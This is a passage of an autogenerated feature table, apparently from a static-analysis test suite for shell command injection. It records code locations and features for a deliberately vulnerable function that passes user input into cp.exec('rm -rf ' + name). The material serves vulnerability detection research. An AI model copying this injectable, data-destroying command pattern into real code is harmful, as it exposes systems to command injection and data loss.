name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:219:7:219:31 | /^([a-z ... $/.test | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:219:7:219:31 | /^([a-z ... $/.test | enclosingFunctionBody | name cp exec rm -rf name /^([a-zA-Z0-9]+))?$/ test name cp exec rm -rf name process exit 1 cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:219:7:219:31 | /^([a-z ... $/.test | enclosingFunctionName | blackList2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:219:7:219:31 | /^([a-z ... $/.test | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:219:7:219:37 | /^([a-z ... t(name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:219:7:219:37 | /^([a-z ... t(name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:219:7:219:37 | /^([a-z ... t(name) | enclosingFunctionBody | name cp exec rm -rf name /^([a-zA-Z0-9]+))?$/ test name cp exec rm -rf name process exit 1 cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:219:7:219:37 | /^([a-z ... t(name) | enclosingFunctionName | blackList2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:219:7:219:37 | /^([a-z ... t(name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:219:7:219:37 | exceptional return of /^([a-z ... t(name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:219:7:219:37 | exceptional return of /^([a-z ... t(name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:219:7:219:37 | exceptional return of /^([a-z ... t(name) | enclosingFunctionBody | name cp exec rm -rf name /^([a-zA-Z0-9]+))?$/ test name cp exec rm -rf name process exit 1 cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:219:7:219:37 | exceptional return of /^([a-z ... t(name) | enclosingFunctionName | blackList2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:219:7:219:37 | exceptional return of /^([a-z ... t(name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:219:28:219:31 | test | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:219:28:219:31 | test | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:219:28:219:31 | test | enclosingFunctionBody | name cp exec rm -rf name /^([a-zA-Z0-9]+))?$/ test name cp exec rm -rf name process exit 1 cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:219:28:219:31 | test | enclosingFunctionName | blackList2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:219:28:219:31 | test | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:219:33:219:36 | name | CalleeFlexibleAccessPath | ?.test | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:219:33:219:36 | name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:219:33:219:36 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:219:33:219:36 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:219:33:219:36 | name | enclosingFunctionBody | name cp exec rm -rf name /^([a-zA-Z0-9]+))?$/ test name cp exec rm -rf name process exit 1 cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:219:33:219:36 | name | enclosingFunctionName | blackList2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:219:33:219:36 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:220:3:220:4 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:220:3:220:4 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:220:3:220:4 | cp | enclosingFunctionBody | name cp exec rm -rf name /^([a-zA-Z0-9]+))?$/ test name cp exec rm -rf name process exit 1 cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:220:3:220:4 | cp | enclosingFunctionName | blackList2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:220:3:220:4 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:220:3:220:9 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:220:3:220:9 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:220:3:220:9 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name /^([a-zA-Z0-9]+))?$/ test name cp exec rm -rf name process exit 1 cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:220:3:220:9 | cp.exec | enclosingFunctionName | blackList2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:220:3:220:9 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:220:3:220:27 | cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:220:3:220:27 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:220:3:220:27 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name /^([a-zA-Z0-9]+))?$/ test name cp exec rm -rf name process exit 1 cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:220:3:220:27 | cp.exec ... + name) | enclosingFunctionName | blackList2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:220:3:220:27 | cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:220:3:220:27 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:220:3:220:27 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:220:3:220:27 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name /^([a-zA-Z0-9]+))?$/ test name cp exec rm -rf name process exit 1 cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:220:3:220:27 | exceptional return of cp.exec ... + name) | enclosingFunctionName | blackList2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:220:3:220:27 | exceptional return of cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:220:6:220:9 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:220:6:220:9 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:220:6:220:9 | exec | enclosingFunctionBody | name cp exec rm -rf name /^([a-zA-Z0-9]+))?$/ test name cp exec rm -rf name process exit 1 cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:220:6:220:9 | exec | enclosingFunctionName | blackList2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:220:6:220:9 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:220:11:220:19 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:220:11:220:19 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:220:11:220:19 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name /^([a-zA-Z0-9]+))?$/ test name cp exec rm -rf name process exit 1 cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:220:11:220:19 | "rm -rf " | enclosingFunctionName | blackList2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:220:11:220:19 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:220:11:220:19 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:220:11:220:26 | "rm -rf " + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:220:11:220:26 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:220:11:220:26 | "rm -rf " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:220:11:220:26 | "rm -rf " + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:220:11:220:26 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:220:11:220:26 | "rm -rf " + name | enclosingFunctionBody | name cp exec rm -rf name /^([a-zA-Z0-9]+))?$/ test name cp exec rm -rf name process exit 1 cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:220:11:220:26 | "rm -rf " + name | enclosingFunctionName | blackList2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:220:11:220:26 | "rm -rf " + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:220:11:220:26 | "rm -rf " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:220:23:220:26 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:220:23:220:26 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:220:23:220:26 | name | enclosingFunctionBody | name cp exec rm -rf name /^([a-zA-Z0-9]+))?$/ test name cp exec rm -rf name process exit 1 cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:220:23:220:26 | name | enclosingFunctionName | blackList2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:220:23:220:26 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:220:23:220:26 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:221:3:221:9 | process | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:221:3:221:9 | process | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:221:3:221:9 | process | enclosingFunctionBody | name cp exec rm -rf name /^([a-zA-Z0-9]+))?$/ test name cp exec rm -rf name process exit 1 cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:221:3:221:9 | process | enclosingFunctionName | blackList2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:221:3:221:9 | process | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:221:3:221:14 | process.exit | contextFunctionInterfaces | 